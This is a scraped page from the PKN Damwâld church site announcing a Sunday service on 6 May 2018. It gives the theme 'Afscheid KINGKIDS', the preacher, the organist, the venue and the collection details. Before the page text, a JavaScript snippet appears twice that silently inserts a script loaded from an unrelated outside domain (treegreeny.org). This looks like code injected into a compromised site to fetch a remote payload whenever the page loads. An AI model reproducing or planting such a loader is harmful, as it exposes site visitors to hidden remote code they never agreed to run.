;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 6 mei 2018 9:30 uur - PKN Damwâld
zondag 6 mei 2018
09:30 uur

Kerkdienst zondag 6 mei 2018 9:30 uur

Thema: Afscheid KINGKIDS !

Informatie

Voorganger:Mw. M.E. Folbert, Ternaard
Organist:Nienke van der Heide-Visser
Thema:Afscheid KINGKIDS !
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Diaconie
Tweede collecte: Kerk
Uitganscollecte: Kerk